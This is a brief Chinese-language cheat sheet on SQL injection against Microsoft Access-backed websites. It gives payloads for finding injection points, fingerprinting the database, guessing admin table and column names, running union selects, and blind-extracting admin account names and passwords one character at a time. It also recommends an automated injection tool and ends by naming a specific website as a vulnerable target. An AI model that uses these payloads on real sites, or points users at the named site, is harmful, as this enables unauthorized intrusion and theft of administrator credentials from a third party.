web安全之Access注入漏洞

Access注入

判断注入点

‘ （报错）

and 1=1 （and前有空格，带入查询，如果返回正常则有漏洞）

and 1=2 （返回错误）

or 1=1 或在id后加-号等等，报错则有漏洞

判断数据库类型

and exsits (select * from msysobjects)>0 （如果存在则是Access数据库）

and exsits (select * from sysobjects)>0

判断数据库是否有admin表

and exists (select * from admin)

如果没有试着尝试 users username password

判断字段名

and exists (select admin from admin) （如果成功说明在admin表里有admin的列名）

and exists (select password from admin)（如果成功说明在admin表里有password的列名）

判断字段长度

order by 10（判断字段长度）

and 1=2 union select 1,2,3,4,5,6,7,8,9 from admin
爆出字段后，在相应字段改写成 admin 和password

判断账号密码的长度

and (select top 1 len(列名) from admin)=长度值 如果返回正常说明管理员账户的长度
and (select top 1 len(列名) from admin)>长度值 

判断账号的第一位数据的ascii码

and (select top 1 asc(mid(admin,1,1)) from admin)>100  第一个数据

and (select top 1 asc(mid(admin,2,1)) from admin)<100  第二个数据

先判断一个位置在慢慢尝试 

直接用工具啊D注入

漏洞网站 http://www.jnqtly.cn/